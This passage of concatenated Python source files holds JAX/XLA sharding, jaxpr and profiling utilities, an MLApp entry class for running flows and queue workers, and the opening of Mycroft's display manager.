        batch_dim_chunks.extend(spec.sharding[batch_dim].chunks)
    # Index of the new chunk axis = number of chunked dims before batch_dim.
    batch_dim_axis = 0
    for sharding in spec.sharding[:batch_dim]:
        if isinstance(sharding, pxla.Chunked):
            batch_dim_axis += 1
    new_sharding = list(spec.sharding)
    new_sharding[batch_dim] = pxla.Chunked(batch_dim_chunks)
    new_mapping = []
    for mapping in spec.mesh_mapping:
        if isinstance(mapping, pxla.Replicated):
            new_mapping.append(mapping)
            continue
        assert isinstance(mapping, pxla.ShardedAxis)
        # Shift sharded axes that come at or after the inserted axis.
        new_axis = mapping.axis
        if mapping.axis >= batch_dim_axis:
            new_axis += 1
        new_mapping.append(pxla.ShardedAxis(new_axis))
    # Map the new micro-batch chunk axis at the end of the mesh mapping.
    new_mapping.append(pxla.ShardedAxis(batch_dim_axis))
    return pxla.ShardingSpec(sharding=tuple(new_sharding),
                             mesh_mapping=tuple(new_mapping))
class XlaPassContext:
    """A global context for passing arguments from python to XLA c++ passes."""

    # The single active context, or None. Nesting is not supported.
    current = None

    def __init__(self, value_dict):
        # Values forwarded to the C++ pass context on __enter__.
        self.value_dict = value_dict

    def __enter__(self):
        assert XlaPassContext.current is None, (
            "Do not support recurrent context")
        XlaPassContext.current = self
        xe.set_pass_context(self.value_dict)

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Always clear the C++ side, even when the body raised.
        XlaPassContext.current = None
        xe.clear_pass_context()
########################################
##### Jaxpr Utilities
########################################
def clone_jaxpr(closed_jaxpr: ClosedJaxpr,
                invars: Sequence[Atom] = None,
                outvars: Sequence[Var] = None,
                eqns: Sequence[JaxprEqn] = None,
                constvars: Sequence[Var] = None,
                consts: Sequence = None):
    """Clone a jaxpr and replace members if they are provided.

    Args:
        closed_jaxpr: The jaxpr to clone.
        invars/outvars/eqns/constvars/consts: Optional replacements. When a
            replacement is None, the corresponding member of ``closed_jaxpr``
            is reused.

    Returns:
        A new ClosedJaxpr.
    """
    # BUG FIX: use explicit None checks. The previous ``x or default``
    # pattern silently ignored *empty* replacement lists (e.g. clearing
    # outvars to []) and fell back to the original member.
    constvars = closed_jaxpr.jaxpr.constvars if constvars is None else constvars
    invars = closed_jaxpr.jaxpr.invars if invars is None else invars
    outvars = closed_jaxpr.jaxpr.outvars if outvars is None else outvars
    eqns = closed_jaxpr.jaxpr.eqns if eqns is None else eqns
    consts = closed_jaxpr.consts if consts is None else consts
    jaxpr = Jaxpr(constvars, invars, outvars, eqns)
    return ClosedJaxpr(jaxpr, consts)
def trace_jaxpr_with_micro_batch(fun: lu.WrappedFun,
                                 batch_invars: Sequence[bool],
                                 num_micro_batches: int,
                                 raw_avals: Sequence[AbstractValue],
                                 batch_dim: int = 0):
    """Trace the jaxpr of the computation of a micro batch.

    Shrinks dimension 0 of every batch argument by ``num_micro_batches``
    and traces ``fun`` at the reduced shapes.

    Returns:
        (closed_jaxpr, micro_batch_size); micro_batch_size is None when
        there are no batch vars.
    """
    assert batch_dim == 0, "Only support batch_dim == 0"
    avals = []
    batch_size = None
    for aval, is_batch_var in zip(raw_avals, batch_invars):
        if is_batch_var:
            assert aval.shape[0] % num_micro_batches == 0, (
                "The batch dimension must be divisable by num_micro_batches.")
            if batch_size is None:
                batch_size = aval.shape[0] // num_micro_batches
            else:
                # All batch vars must agree on the micro-batch size.
                assert batch_size == aval.shape[0] // num_micro_batches, (
                    "The batch dimension must be the same for all batch vars.")
            shape = (batch_size,) + aval.shape[1:]
            avals.append(aval.update(shape=shape))
        else:
            avals.append(aval)
    # Disable jit so tracing records the raw jaxpr without compiling.
    with jax.disable_jit():
        jaxpr, _, consts = pe.trace_to_jaxpr_final(fun, avals)
    closed_jaxpr = ClosedJaxpr(jaxpr, consts)
    return closed_jaxpr, batch_size
def slices_to_jaxpr(
        closed_jaxpr: ClosedJaxpr,
        sliced_eqns: Sequence[Sequence[JaxprEqn]]) -> Sequence[ClosedJaxpr]:
    """Wrap sliced equations to a list of ClosedJaxpr.

    Each slice becomes its own ClosedJaxpr whose invars/outvars/consts are
    inferred from cross-slice data flow.
    """
    n_eqns = len(sliced_eqns)
    global_invars = OrderedSet(closed_jaxpr.jaxpr.invars)
    global_outvars = OrderedSet(
        var for var in closed_jaxpr.jaxpr.outvars if isinstance(var, Var))
    global_consts = dict(zip(closed_jaxpr.jaxpr.constvars, closed_jaxpr.consts))
    # Per-layer bookkeeping of inputs, outputs, and captured constants.
    layer_invars = [OrderedSet() for _ in range(n_eqns)]
    layer_outvars = [OrderedSet() for _ in range(n_eqns)]
    layer_consts = [{} for _ in range(n_eqns)]
    var_layer_dict = {}  # Dict[var -> layer_idx]: the layer defining var
    for i, eqns in enumerate(sliced_eqns):
        for eqn in eqns:
            for var in eqn.invars:
                if isinstance(var, Literal):
                    continue
                if var in global_consts:
                    # Captured constant: copied into this layer's consts.
                    layer_consts[i][var] = global_consts[var]
                elif var in global_invars:
                    layer_invars[i].add(var)
                elif var_layer_dict[var] != i:
                    # Cross-layer dependency: output of the defining layer,
                    # input of this one.
                    layer_invars[i].add(var)
                    layer_outvars[var_layer_dict[var]].add(var)
                else:
                    assert var_layer_dict[var] == i
            for var in eqn.outvars:
                if not isinstance(var, DropVar):
                    var_layer_dict[var] = i
                    if var in global_outvars:
                        layer_outvars[i].add(var)
    result = []
    for i, eqns in enumerate(sliced_eqns):
        new_jaxpr = Jaxpr(list(layer_consts[i].keys()), list(layer_invars[i]),
                          list(layer_outvars[i]), eqns)
        new_closed_jaxpr = ClosedJaxpr(new_jaxpr,
                                       list(layer_consts[i].values()))
        result.append(new_closed_jaxpr)
    return result
def get_var_mapping(mapping, var):
    """Return mapping[var] when ``var`` is a Var with an entry; else ``var``."""
    is_mapped = isinstance(var, Var) and var in mapping
    return mapping[var] if is_mapped else var
def log_jaxpr(jaxpr: ClosedJaxpr, filename: str):
    """Dump the textual form of a jaxpr to /tmp/<filename> for debugging."""
    dump_path = "/tmp/" + filename
    with open(dump_path, "w", encoding="utf-8") as dump_file:
        dump_file.write(str(jaxpr))
########################################
##### Profiling Utilities
########################################
def profile_xla_executable(compiled, backend, local_devices):
    """Measure the time costs of a xla executable with dummy inputs.

    Args:
        compiled: compiled XLA executable (exposes hlo_modules/execute/...).
        backend: XLA backend used to allocate the dummy input buffers.
        local_devices: devices to allocate on; device 0 is used to sync.

    Returns:
        The per-repeat average run times, or [inf, inf, inf] on OOM or
        runtime failure.
    """
    hlo_module = compiled.hlo_modules()[0]
    # Sentinel returned whenever allocation or execution fails.
    cost_failed = [np.inf] * 3

    # Allocate dummy buffers
    input_shapes = hlo_module.parameter_shapes()

    # prune OOM cases, not exact because third party lib not considered:
    free_mem = local_devices[0].available_memory()
    input_bytes = 0
    for shape in input_shapes:
        input_bytes += np.prod(
            shape.dimensions()) * shape.numpy_dtype().itemsize
    # NOTE(review): input_bytes is computed but never used below; the OOM
    # check relies on total_allocation_size() instead — confirm and clean up.
    if free_mem < compiled.total_allocation_size() and free_mem != -1:
        return cost_failed

    device_inputs = []
    try:
        for shape in input_shapes:
            device_inputs.append([
                backend.buffer_from_pyval(
                    np.empty(shape.dimensions(), shape.numpy_dtype()), device)
                for device in local_devices
            ])
        local_devices[0].synchronize_all_activity()
    except RuntimeError:
        return cost_failed

    # Run benchmark
    def run_func():
        device_outputs = compiled.execute_sharded_on_local_devices(
            device_inputs)

        # Reset the value for donate buffers
        ct = 0
        for j in range(len(device_inputs)):
            if device_inputs[j][0].is_deleted():
                # A donated input was consumed; reuse the matching output
                # buffer so the next iteration has valid arguments.
                device_inputs[j] = device_outputs[ct]
                ct += 1
        local_devices[0].synchronize_all_activity()

    try:
        costs = benchmark_func(run_func, repeat=3, number=3)
    except RuntimeError:
        costs = cost_failed
    return costs
def benchmark_func(run_func,
                   sync_func=None,
                   warmup=1,
                   repeat=3,
                   number=5,
                   min_repeat_second=None):
    """
    Benchmark the execution time of a function.

    The function is executed (warmup + number * repeat) times in total.
    Returns `repeat` values, each the average execution time over `number`
    calls. When `min_repeat_second` is given, `number` is chosen so that a
    single repeat lasts at least that many seconds.
    """
    # Warm up before timing anything.
    for _ in range(warmup):
        run_func()

    # Auto-pick `number` from a single timed call when requested.
    if min_repeat_second:
        if sync_func:
            sync_func()
        start = time.time()
        run_func()
        if sync_func:
            sync_func()
        single_cost = time.time() - start
        number = max(int(min_repeat_second / single_cost), 1)

    # Timed repeats.
    costs = []
    for _ in range(repeat):
        if sync_func:
            sync_func()
        start = time.time()
        for _ in range(number):
            run_func()
        if sync_func:
            sync_func()
        costs.append(time.time() - start)

    return np.array(costs) / number
def run_with_timeout(func, args=(), kwargs=None, timeout=None):
    """Run func(*args, **kwargs) in a worker thread with a timeout.

    Args:
        func: the callable to run.
        args: positional arguments for `func`.
        kwargs: keyword arguments for `func` (None means {}).
        timeout: seconds to wait; None waits forever.

    Returns:
        The return value of `func`.

    Raises:
        TimeoutError: if `func` does not finish within `timeout` seconds.
        RuntimeError: if `func` exits without producing a result
            (e.g. it raised an exception in the worker thread).
    """
    ret_value = []

    def _target_func():
        ret_value.append(func(*args, **(kwargs or {})))

    # daemon=True: a timed-out worker must not keep the process alive at exit
    # (the original non-daemon thread blocked interpreter shutdown).
    t = threading.Thread(target=_target_func, daemon=True)
    t.start()
    t.join(timeout=timeout)
    if t.is_alive():
        raise TimeoutError(
            f"function did not finish within {timeout} seconds")
    if not ret_value:
        raise RuntimeError("function exited without producing a result")
    return ret_value[0]
########################################
##### Array conversion
########################################
def is_continuous_subset(tensor_slice, tensor_shape, row_major=True):
    """
    Figure out whether a slice is a continuous subset of the tensor.

    Args:
        tensor_slice (Sequence[slice]): the slice taken on each dimension.
        tensor_shape (Sequence[int]): the shape of the tensor.
        row_major (bool): whether the tensor layout is row-major.

    Returns:
        bool: True if the sliced elements are contiguous in memory.

    Raises:
        NotImplementedError: for column-major layouts.
        RuntimeError: if the slice and shape ranks differ.
    """
    if not row_major:
        raise NotImplementedError("Do not support column major.")
    ndim = len(tensor_shape)
    if len(tensor_slice) != ndim:
        raise RuntimeError("ndims mismatch.")
    slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
    for dim, dim_shape in enumerate(slice_shape):
        if dim_shape == 1:
            # A size-1 dim never breaks contiguity; check the next one.
            continue
        # The first dim sliced wider than 1 must be followed only by
        # fully-covered dims for the slice to be contiguous.
        return slice_shape[dim + 1:] == tensor_shape[dim + 1:]
    # Fix: every dim has size 1 — a single element is trivially continuous.
    # (The original fell off the loop and returned None here.)
    return True
def infer_offset_and_n_elements(tensor_slice):
    """Compute (offset, #elements) of a slice before making NCCL calls.

    Assumes the slice is a continuous subset of the original tensor; the
    offset tuple stops at the first dimension sliced wider than 1.
    """
    slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
    n_elements = np.prod(slice_shape)
    offset = []
    for dim_slice, dim_shape in zip(tensor_slice, slice_shape):
        offset.append(dim_slice.start)
        if dim_shape > 1:
            break
    return tuple(offset), n_elements
def xla_buffer_to_jax_tensor(xla_buf):
    """Wrap an XLA buffer as a JAX DeviceArray so it supports indexing."""
    shaped = ShapedArray(xla_buf.shape, xla_buf.dtype)
    return _DeviceArray(shaped, xla_buf.device(), xla_buf)
def jax_tensor_to_xla_buffer(jax_buf):
    """Return the underlying XLA buffer of a JAX DeviceArray."""
    buf = jax_buf.device_buffer
    return buf
def xla_buffer_to_cupy(xla_buf, take_ownership=False):
    """Convert an XLA buffer directly to cupy via DLPack (no JAX hop)."""
    managed = xc._xla.buffer_to_dlpack_managed_tensor(  # pylint: disable=protected-access
        xla_buf,
        take_ownership=take_ownership)
    return cp.fromDlpack(managed)
def cupy_to_xla_buffer(tensor):
    """Convert cupy tensors (or nested lists of them) to XLA buffers."""
    if isinstance(tensor, list):
        return [cupy_to_xla_buffer(t) for t in tensor]
    cpu_backend = xb.get_backend("cpu")
    # The GPU backend is optional (e.g. CPU-only builds).
    try:
        gpu_backend = xb.get_backend("gpu")
    except RuntimeError:
        gpu_backend = None
    return xc._xla.dlpack_managed_tensor_to_buffer(  # pylint: disable=protected-access
        tensor.toDlpack(), cpu_backend, gpu_backend)
def jax_tensor_to_cupy(tensors, take_ownership=False):
    """Convert a Jax DeviceArray (or nested list) to cupy tensor; zero copy.

    Fix: the recursive list case previously dropped `take_ownership` and
    always used the default False; it is now forwarded to every element.
    """
    if isinstance(tensors, list):
        return [
            jax_tensor_to_cupy(t, take_ownership=take_ownership)
            for t in tensors
        ]
    return cp.fromDlpack(to_dlpack(tensors, take_ownership=take_ownership))
def cupy_to_jax_tensor(tensors):
    """Convert cupy tensors (or nested lists of them) to JAX tensors."""
    if isinstance(tensors, list):
        return [cupy_to_jax_tensor(t) for t in tensors]
    return from_dlpack(tensors.toDlpack())
# Note: use Python jit instead of CPP jit,
# because CPP jit has bugs on _DeviceArray.
# NOTE(review): applied only when this module runs in a worker process
# (is_worker) — confirm the driver intentionally keeps the default jit.
if is_worker:
    FLAGS.experimental_cpp_jit = False
# Note(Hao): this function will be jit-ed into as many versions as the possible
# length of start_indices
@partial(jax.jit, donate_argnums=0, static_argnums=2)
def jax_tensor_set(src_buf, update, start_indices):
    """
    In-place write on a JAX buffer (src_buf is donated, so its storage is
    reused for the result).

    Args:
        src_buf: JAX device array to write into.
        update: JAX device array holding the new values.
        start_indices (tuple[int]): starting index of the write on each
            dimension; static, so every distinct tuple triggers a new trace.
    """
    return jax.lax.dynamic_update_slice(src_buf, update, start_indices)
@partial(jax.jit, static_argnums=(1, 2))
def jax_tensor_index(src_tensor, indices, size):
    """Slice `size` elements out of `src_tensor` starting at `indices`."""
    return jax.lax.dynamic_slice(src_tensor, indices, size)
########################################
##### OS / IO Utilities
########################################
def run_cmd(cmd: str):
    """Echo a bash command, run it, and return its exit status."""
    print(cmd)
    return os.system(cmd)
def list_gpu_info():
    """List all gpu information by calling nvidia-smi."""
    output = subprocess.getoutput("nvidia-smi -L")
    visible_devices = os.environ.get("CUDA_VISIBLE_DEVICES", None)
    if visible_devices:
        # Keep only the lines of the devices exposed to this process.
        ids = [int(x) for x in visible_devices.split(",")]
        lines = output.split("\n")
        output = "\n".join(lines[i] for i in ids)
    return output
def disable_tqdm_globally():
    """Disable tqdm progress bars globally by monkey-patching its __init__."""
    patched_init = partialmethod(tqdm.tqdm.__init__, disable=True)
    tqdm.tqdm.__init__ = patched_init
def get_num_hosts_and_num_devices(args):
    """Get the number of hosts and the number of devices per host for
    benchmark scripts.

    Resolution order: explicit args, then local GPU probing, then ray.
    """
    if args.num_hosts is not None or args.num_devices_per_host is not None:
        # If either value is given explicitly, both must be.
        assert (args.num_hosts is not None and
                args.num_devices_per_host is not None)
        return args.num_hosts, args.num_devices_per_host
    if hasattr(args, "local") and args.local:
        # Single local host; count GPUs from nvidia-smi output.
        return 1, list_gpu_info().count("UUID")
    # Fall back to the ray cluster's view of the world.
    ray.init(address="auto")
    num_hosts = len(ray.nodes())
    num_devices_per_host = int(ray.cluster_resources()["GPU"]) // num_hosts
    return num_hosts, num_devices_per_host
def write_tsv(heads: Sequence[str],
              values: Sequence[Any],
              filename: str,
              print_line: bool = True):
    """Append one row of tsv data to `filename`; optionally echo it."""
    assert len(heads) == len(values)
    values = [str(v) for v in values]
    with open(filename, "a", encoding="utf-8") as fout:
        fout.write("\t".join(values) + "\n")
    if print_line:
        # Same "head: value " layout (incl. trailing space) as before.
        line = "".join(f"{h}: {v} " for h, v in zip(heads, values))
        print(line)
def to_str_round(x: Any, decimal: int = 6):
    """Print a python object but round all floating point numbers.

    Args:
        x: str, list/tuple/ndarray, dict, int/float (incl. numpy scalars),
            or None.
        decimal: number of digits kept for floats.

    Raises:
        ValueError: for unsupported value types.
    """
    if isinstance(x, str):
        return x
    if isinstance(x, (list, tuple, np.ndarray)):
        tmp_str = ", ".join([to_str_round(y, decimal=decimal) for y in x])
        return "[" + tmp_str + "]"
    if isinstance(x, dict):
        return str({k: to_str_round(v, decimal=decimal) for k, v in x.items()})
    # Fix: iterating an int ndarray yields np.int64 scalars, which are not
    # `int` instances and used to fall through to the ValueError below.
    if isinstance(x, (int, np.integer)):
        return str(x)
    if isinstance(x, (float, np.floating)):
        format_str = f"%.{decimal}f"
        return format_str % x
    if x is None:
        return str(x)
    raise ValueError("Invalid value: " + str(x))
_tic = None  # timestamp of the previous print_used_time call


def print_used_time(message: str):
    """Print a message and the elapsed time from the last call.

    Fix: the very first call with a non-empty message used to crash with
    ``TypeError`` (time.time() - None); the elapsed line is now only
    printed once a previous timestamp exists.
    """
    global _tic
    if message and _tic is not None:
        print(f" - {message}: {time.time() - _tic:.2f} s")
    _tic = time.time()
########################################
##### Other Utilities
########################################
GB = 1 << 30 # Gigabyte
MB = 1 << 20 # Megabyte
def map_to_shape(array_pytree: PyTreeDef):
    """Map a PyTree of jax arrays to a PyTree of their shapes (None for
    leaves without a shape attribute)."""
    return tree_map(lambda leaf: getattr(leaf, "shape", None), array_pytree)
def compute_bytes(pytree: PyTreeDef):
    """Compute the total bytes of arrays in a pytree."""
    leaves, _ = tree_flatten(pytree)
    return sum(
        np.prod(leaf.shape) * leaf.dtype.itemsize
        for leaf in leaves
        if hasattr(leaf, "shape"))
def compute_param_number(pytree: PyTreeDef):
    """Compute the total number of elements in a pytree."""
    leaves, _ = tree_flatten(pytree)
    return sum(
        np.prod(leaf.shape) for leaf in leaves if hasattr(leaf, "shape"))
_DISABLE_NUMBA = False  # set True to force the pure-Python fallback path


def maybe_numba_jit(func):
    """Decorator to mark a function as numba jitted if numba is available.

    Falls back to the original function (with a warning) when numba is not
    installed. The jitted path can be bypassed at runtime via
    ``_DISABLE_NUMBA``.
    """
    try:
        from numba import jit  # pylint: disable=import-outside-toplevel
        # Local import keeps this module import-light when numba is absent.
        from functools import wraps  # pylint: disable=import-outside-toplevel

        jitted_func = jit(nopython=True)(func)

        # Fix: preserve func's name/docstring on the wrapper so tooling and
        # tracebacks keep pointing at the decorated function.
        @wraps(func)
        def wrapper(*args, **kwargs):
            if _DISABLE_NUMBA:
                return func(*args, **kwargs)
            return jitted_func(*args, **kwargs)

        return wrapper
    except ImportError:
        logger.warning("Install numba to jit and accelerate the function.")
        return func
def is_ray_node_resource(resource_key):
    """Check if the given ray resource key is a host ip (``node:<ipv4>``)."""
    pattern = r"^node:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"
    return re.match(pattern, resource_key)
|
main.py | import multiprocessing
from mlapp.env_loader import EnvironmentLoader
from mlapp.utils.general import read_json_file
import importlib
import uuid
import json
from mlapp.handlers.wrappers.database_wrapper import database_instance
from mlapp.handlers.wrappers.file_storage_wrapper import file_storage_instance
from mlapp.handlers.wrappers.message_queue_wrapper import message_queue_instance
from mlapp.handlers.wrappers.spark_wrapper import spark_instance
from mlapp.managers.flow_manager import FlowManager
import traceback
from ast import literal_eval
from mlapp.config import settings, environment_services
import os
class MLApp(object):
    """Main endpoint of the ML App library.

    Merges custom settings into the global configuration, loads the
    environment defined with the ML App CLI, and exposes entry points to
    run flows (single- and multi-process), run a queue-listening worker,
    or dispatch configurations to an outside queue.
    """
    MLAPP_SERVICE_TYPE = '_MLAPP_SERVICE_TYPE'

    def __init__(self, inner_settings=None):
        """
        Constructor for the MLApp Class.
        This class, when becomes instantiated is the main endpoint for the ML App Library.
        To this constructor you pass in your custom settings, which sets up your customized configuration of ML App,
        and Environment that you defined with the ML App CLI.
        After the instantiation you can use the instance to run:
        - Flows (single-process and multi-process)
        - Applications/Workers (using the queue listener)
        - Send configurations to an outside queue
        """
        if inner_settings is None:
            inner_settings = {}
        # Merge the caller's settings into the global settings:
        # dicts are updated, lists extended, scalars overwritten.
        for key in inner_settings:
            if isinstance(inner_settings[key], dict):
                if key not in settings:
                    settings[key] = {}
                settings[key].update(inner_settings[key])
            elif isinstance(inner_settings[key], list):
                if key not in settings:
                    settings[key] = []
                settings[key] += inner_settings[key]
            else:
                settings[key] = inner_settings[key]

        # init environment services
        env = EnvironmentLoader.load(filename=inner_settings.get('env_file_path', ''))
        # Service types are declared via env vars ending in _MLAPP_SERVICE_TYPE.
        env_services_dict = {
            k.replace(self.MLAPP_SERVICE_TYPE, ''): os.environ[k].lower()
            for k in os.environ if k.endswith(self.MLAPP_SERVICE_TYPE)
        }
        settings['services'] = EnvironmentLoader.create_services(env, env_services_dict, environment_services)
        for wrapper_instance in [file_storage_instance, database_instance, message_queue_instance, spark_instance]:
            wrapper_instance.init()

    # ======== TASK RUN ==========
    def _on_callback(self, message_body):
        """
        This is the function that executes the configuration sent to the application/worker.
        :param message_body: the configuration in bytes/string format.
        :return: None
        """
        job_id = 'None'
        try:
            message_body = message_body.decode("utf-8")
        except AttributeError:
            pass  # message body is string and not bytes

        print("Hello, The following task is consumed: " + str(message_body))
        # The message may be double-encoded (see _dispatch_jobs_to_mq), so
        # try literal_eval + loads first, then plain json.loads.
        try:
            message_config = json.loads(literal_eval(message_body))
        except Exception:
            try:
                message_config = json.loads(message_body)
            except Exception:
                print("Error response: " + str('Message not in JSON format'))
                traceback.print_exc()
                self._send_error_response_to_mq(job_id, '-1', str('Message not in JSON format'))
                return

        print(message_config)
        try:
            job_id = str(message_config.get('job_id', str(uuid.uuid4())))
            results = self._run_flow(job_id, message_config)
            self._send_ok_response_to_mq(
                job_id, results.get('status_code', -1), 'all went ok', results.get('response', {}))
        except Exception as error:
            print("Error response: " + str(error))
            traceback.print_exc()
            self._send_error_response_to_mq(job_id, '-1', str(error))

    # =========== TASK HANDLERS ===========
    def _run_flow(self, job_id, config):
        """
        This is the function that executes the Flow of your configuration.
        :param job_id: the job identifier used for monitoring via the Control Panel.
        :param config: the configuration as Dictionary.
        :return: Dictionary containing the status and response of the flow run.
        """
        # update job
        database_instance.update_job_running(job_id)

        # call Flow_manager to run the job
        status_code, response, _ = FlowManager(job_id, config).run()
        return {'status_code': status_code, 'response': response}

    # ======== MQ HANDLERS =========
    def _send_ok_response_to_mq(self, job_id, status_code, status_msg, result):
        """
        This function sends response back to the Control Panel via queue if the job succeeded
        :param job_id: the job identifier used for monitoring via the Control Panel.
        :param status_code: result status of the flow run.
        :param status_msg: result message of the flow run.
        :param result: response of the flow run - if json serialized returned in the message queue as well.
        :return: None
        """
        response_obj = {
            "job_id": job_id, "status_code": status_code, "status_msg": status_msg
        }
        try:
            # trying to JSON-ify result object
            response_obj['result'] = result
            response_json = json.dumps(response_obj)
        except Exception as error:
            # Result not serializable: still report success, without it.
            print(error)
            response_obj['result'] = {}
            response_json = json.dumps(response_obj)
        message_queue_instance.send_message(settings['queues']['send_queue_name'], response_json)

    def _send_error_response_to_mq(self, job_id, status_code, status_msg):
        """
        This function sends response back to the Control Panel via queue if the job failed
        :param job_id: the job identifier used for monitoring via the Control Panel.
        :param status_code: error status of the flow run.
        :param status_msg: error message of the flow run.
        :return: None
        """
        response_json = json.dumps({"job_id": job_id, "status_code": status_code, "status_msg": status_msg})
        message_queue_instance.send_message(settings['queues']['send_queue_name'], response_json)

    def _dispatch_jobs_to_mq(self, configurations):
        """
        This function sends configurations to the queue to be picked up later by a listening Application/Worker.
        :param configurations: list of configurations to be sent
        :return: None
        """
        for configuration in configurations:
            # NOTE: double json.dumps is intentional — _on_callback undoes it
            # with literal_eval + json.loads on the consumer side.
            response_json = json.dumps(configuration)
            message_queue_instance.send_message(settings['queues']['send_queue_name'], json.dumps(response_json))

    # ======== LISTENER =========
    def run_listener(self):
        """
        This function is an endpoint of the ML App Library to be used in an Application/Worker.
        It sets up a listening queue indefinitely waiting for configuration to process upon receive.
        """
        message_queue_instance.listen_to_queues(settings['queues']['listen_queue_names'], self._on_callback)

    # ======== RUN CONFIG =========
    def run_flow(self, asset_name, config_path, config_name=None, **kwargs):
        """
        This function is an endpoint of the ML App Library to be used in a local environment.
        It runs a local configuration file in your local computer.
        :param asset_name: name of the asset to be run
        :param config_path: path to configuration file
        :param config_name: in case configuration file is python looks for variable in this name as the configuration
        :return: List containing the outputs defined in configuration file
        """
        job_id = str(uuid.uuid4())
        try:
            config = read_json_file(config_path)
        except Exception:
            # Not JSON: fall back to a python config module.
            config = self._read_py_file(asset_name, config_path, config_name)
        self._insert_latest_id_in_config(config)
        _, run_ids, outputs = FlowManager(job_id, config, **kwargs).run()
        self._update_latest_model_id(config, run_ids)
        return outputs

    @staticmethod
    def run_flow_from_config(config):
        """Run a flow directly from an in-memory configuration dict."""
        return FlowManager("deployment", config).run()

    # ======== SEND CONFIG TO MQ =========
    def run_msg_sender(self, asset_name, config_path, config_name=None):
        """
        This function is an endpoint of the ML App Library to be used in a local environment.
        It sends a local configuration file in your local computer to be run in an outside Application/Worker via
        message queue.
        :param asset_name: name of the asset to be run
        :param config_path: path to configuration file
        :param config_name: in case configuration file is python looks for variable in this name as the configuration
        """
        try:
            message_to_send = read_json_file(config_path)
        except Exception:
            message_to_send = self._read_py_file(asset_name, config_path, config_name)
        job_id = str(uuid.uuid4())
        message_to_send['job_id'] = job_id
        message_queue_instance.send_message(settings['queues']['listen_queue_names'][0], json.dumps(message_to_send))
        print("Message Sent (job_id: " + job_id + "): ", asset_name, config_path)

    # ======== RUN CONFIGS MULTIPROCESSING =========
    def run_configs_multiprocessing(self, instructions):
        """
        This function is an endpoint of the ML App Library.
        It runs multiple configurations in multi-processing.
        :param instructions: list of instruction to send to each process
        """
        jobs = []
        for instruction in instructions:
            p = multiprocessing.Process(target=self._run_config_multiprocess, args=(instruction,))
            jobs.append(p)
            p.start()
        for p in jobs:
            p.join()

    # ======== HELPER PRIVATE FUNCTIONS =========
    def _run_config_multiprocess(self, instruction):
        """
        This function is executes instruction of a process when used by `run_configs_multiprocessing`.
        :param instruction: instruction Dictionary containing asset_name, config_path and config_name.
        - asset_name: name of the asset to be run
        - config_path path to configuration file
        - config_name in case configuration file is python looks for variable in this name as the configuration
        """
        try:
            self.run_flow(instruction['asset_name'], instruction['config_path'], instruction.get('config_name'))
        except Exception as err:
            print(err)
            traceback.print_exc()

    @staticmethod
    def _read_py_file(asset_name, config_path, config_name):
        """
        This function fetches a configuration Dictionary stored in a python file.
        :param asset_name: name of the asset to be run
        :param config_path: path to configuration file
        :param config_name: variable in the python file containing the configuration
        :return: Configuration as a Dictionary
        """
        spec = importlib.util.spec_from_file_location(asset_name, config_path)
        config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(config)
        return config.__dict__[config_name]

    @staticmethod
    def _insert_latest_id_in_config(config):
        """
        This is a helper function for using `latest` feature in local environment.
        Updates current configuration to be run with the latest id stored in a local file containing it
        by reference of asset name.
        :param config: current flow run configuration as a Dictionary
        """
        # prepare latest file
        local_path = settings.get('local_storage_path', 'output')
        latest_file_name = settings.get('latest_file_name', 'latest_ids.json')
        latest_ids_path = os.path.join(local_path, latest_file_name)
        try:
            with open(latest_ids_path) as f:
                latest = json.load(f)
        except Exception:
            # Missing or corrupt file: behave as if no latest ids exist.
            latest = {}

        # iterate pipelines
        for i, pipeline in enumerate(config.get('pipelines_configs', [])):
            # iterate optional ids
            for id_type in ['model_id', 'data_id', 'reuse_features_id']:
                # check if requested latest
                if pipeline.get('job_settings', {}).get(id_type, None) == 'latest':
                    # get current asset name
                    asset_name = pipeline['job_settings']['asset_name']
                    # check if available id
                    if asset_name in latest:
                        # TODO: add here asset label level
                        # TODO: add here data_id/model_id/reuse_features_id
                        config['pipelines_configs'][i]['job_settings'][id_type] = latest[asset_name]
                    else:
                        # raise exception as not found id
                        raise Exception("Could not find latest `" + id_type + "` for `" + asset_name + "`. \n"
                                        "Please update your config with a valid `" + id_type + "`")

    @staticmethod
    def _update_latest_model_id(config, run_ids):
        """
        This is a helper function for using `latest` feature in local environment.
        Updates local file containing the latest id used for an asset.
        :param config: current flow run configuration as a Dictionary
        :params run_ids: list of mlapp identifiers generated in the current flow run.
        """
        # prepare latest file
        local_path = settings.get('local_storage_path', 'output')
        latest_file_name = settings.get('latest_file_name', 'latest_ids.json')
        if not os.path.exists(local_path):
            os.makedirs(local_path)
        latest_ids_path = os.path.join(local_path, latest_file_name)
        latest = {}
        try:
            with open(latest_ids_path) as f:
                latest = json.load(f)
        except Exception:
            # No previous file (or unreadable): start from an empty map.
            pass

        # iterate over pipelines
        for pipeline, run_id in zip(config['pipelines_configs'], run_ids):
            # check if ran any pipeline where id is being stored
            # TODO: add here asset label level
            # TODO: add here data_id/model_id/reuse_features_id
            if pipeline['job_settings']['pipeline'] in ['train', 'feature_engineering']:
                latest[pipeline['job_settings']['asset_name']] = run_id
        with open(latest_ids_path, 'w') as f:
            json.dump(latest, f)
|
display_manager.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from threading import Thread, Timer
import os
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
def _write_data(dictionary):
    """Writes the params as JSON to the
    IPC dir (/tmp/mycroft/ipc/managers)
    args:
        dict: dictionary
    """
    managerIPCDir = os.path.join(get_ipc_directory(), "managers")
    # change read/write permissions based on if file exists or not
    path = os.path.join(managerIPCDir, "disp_info")
    permission = "r+" if os.path.isfile(path) else "w+"

    if permission == "w+" and os.path.isdir(managerIPCDir) is False:
        os.makedirs(managerIPCDir)
        # Fix: 0o777 instead of the old 0777 literal — same value on
        # Python 2.6+, but 0777 is a syntax error on Python 3.
        os.chmod(managerIPCDir, 0o777)

    try:
        with open(path, permission) as dispFile:
